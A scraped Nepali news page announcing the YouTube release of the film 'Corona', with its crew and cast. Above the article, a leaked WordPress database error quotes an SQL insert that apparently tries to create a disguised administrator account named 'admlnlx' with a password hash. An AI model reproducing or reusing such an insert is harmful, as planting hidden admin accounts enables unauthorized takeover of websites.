WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BurwcYD2WN6jJMPWvUxHuwGjdBMhGF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 08:00:29', '', 'admlnlx', 'admlnlx')

चलचित्र ‘कोरोना’ सार्वजानिक (भिडियो सहित) – Gaule Khabar

चलचित्र ‘कोरोना’ सार्वजानिक (भिडियो सहित)

चलचित्र ‘कोरोना’ सार्वजानिक (भिडियो सहित)

काठमाण्डौ । निर्देशक सोम कुस्कुमाझीद्धारा निर्देशित कोरोनाभाइरस बारे नेपालमा बनेको पहिलो चलचित्र ‘कोरोना’ सार्वजानिक भएको छ । कोरोना महामारीबिच उक्त चलचित्र निफा टिभी युटुब च्यानलबाट सार्वजानिक गरिएको हो ।

सकुन्तला माझिको कथा रहेको उक्त चलचित्रमा रुपेश माझिले प्रोडक्सन म्यानेजर, राजा राम खड्का र कुमार माझी निर्माता रहेका छन भने सञ्चारकर्मी कमल फुयाँल कार्यकारी निर्माता रहेका छन । यमन माझिको कन्सेप्ट र आवाज रहेको उक्त चलचित्रको ब्याकराउण्ड स्कोर कर्साङ लामाको रहेको छ । फिल्ममा छायाङकन गंगारमा राईको रहेको छ भने सम्पादन अर्जुन खड्काले गरेका हुन ।

चलचित्रमा अर्जुन खड्का, सन्ध्या खड्का, अजय खड्का, खुशी श्रेष्ठ, बिबेक खड्का, अर्जुन श्रेष्ठ, हिरो राइ, सुनिल नापित, अनुस्का थापा नापित, टिका घिमिरे, लक्ष्मण श्रेष्ठ, बिष्णु हरी रिमाल, आयुश सुनार, जयन खड्का, कुमार न्यौपाने, कृष्ण कुमारी खड्का, सिम्रन राइ, सविना तामाङ, अस्मिता गौतम चम्पा लगायत कलाकारको अभिनय रहेको छ ।

https://www.youtube.com/watch?v=QnX1zEMcXas&feature=emb_logo

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका